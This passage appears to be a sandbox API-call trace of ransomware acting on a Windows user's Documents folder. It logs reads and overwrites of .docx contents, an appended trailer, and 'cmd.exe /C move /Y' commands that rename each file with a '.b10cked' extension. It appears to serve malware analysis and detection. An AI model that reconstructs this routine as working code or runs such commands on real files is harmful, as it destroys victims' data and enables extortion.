cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.974] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 
dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbd0, dwThreadId=0xbcc)) returned 1 [0135.043] CloseHandle (hObject=0x110) returned 1 [0135.043] CloseHandle (hObject=0x114) returned 1 [0135.043] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.043] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.043] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0135.043] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.043] ReleaseMutex (hMutex=0xf8) returned 1 [0135.043] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.043] ReleaseMutex (hMutex=0xf8) returned 1 [0135.043] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.043] ReleaseMutex (hMutex=0xf8) returned 1 [0135.043] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.043] ReleaseMutex (hMutex=0xf8) returned 1 [0135.043] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\ERN4JQpRpgZde9N.docx" (normalized: "c:\\users\\eebsym5\\documents\\ern4jqprpgzde9n.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19183298039) returned 1 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14a0d [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.045] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x14525 [0135.045] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14a0d [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0135.046] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14a0d [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.047] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa505, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa505, lpOverlapped=0x0) returned 1 [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.047] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa505, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa505, lpOverlapped=0x0) returned 1 [0135.047] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42245, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa508 [0135.047] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa505, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa505, lpOverlapped=0x0) returned 1 [0135.048] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42245, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa508 [0135.048] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa505, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa505, lpOverlapped=0x0) returned 1 [0135.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ERN4JQpRpgZde9N.docx", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0135.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ERN4JQpRpgZde9N.docx", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERN4JQpRpgZde9N.docx", lpUsedDefaultChar=0x0) returned 20 [0135.052] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14a0d [0135.052] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0135.052] CloseHandle (hObject=0x114) returned 1 [0135.053] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\ERN4JQpRpgZde9N.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC") returned 0x26 [0135.053] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0135.054] CreateProcessW 
(in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc5c, dwThreadId=0xc60)) returned 1 [0135.113] CloseHandle (hObject=0x110) returned 1 [0135.113] CloseHandle (hObject=0x114) returned 1 [0135.113] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.113] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.113] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0135.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.113] ReleaseMutex (hMutex=0xf8) returned 1 [0135.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.113] ReleaseMutex (hMutex=0xf8) returned 1 [0135.113] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.113] ReleaseMutex (hMutex=0xf8) returned 1 [0135.113] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0135.113] ReleaseMutex (hMutex=0xf8) returned 1 [0135.113] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\M9MmOpgceUJDVTGEEh.docx" (normalized: "c:\\users\\eebsym5\\documents\\m9mmopgceujdvtgeeh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.113] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19190251473) returned 1 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.113] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.114] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcef0 [0135.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xca08 [0135.115] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, 
lpOverlapped=0x0) returned 1 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xcef0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xcef0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.116] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6777, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6777, lpOverlapped=0x0) returned 1 [0135.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.116] WriteFile (in: hFile=0x114, 
lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6777, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6777, lpOverlapped=0x0) returned 1 [0135.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6779 [0135.117] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6777, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6777, lpOverlapped=0x0) returned 1 [0135.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26487, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6779 [0135.117] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6777, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6777, lpOverlapped=0x0) returned 1 [0135.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="M9MmOpgceUJDVTGEEh.docx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, 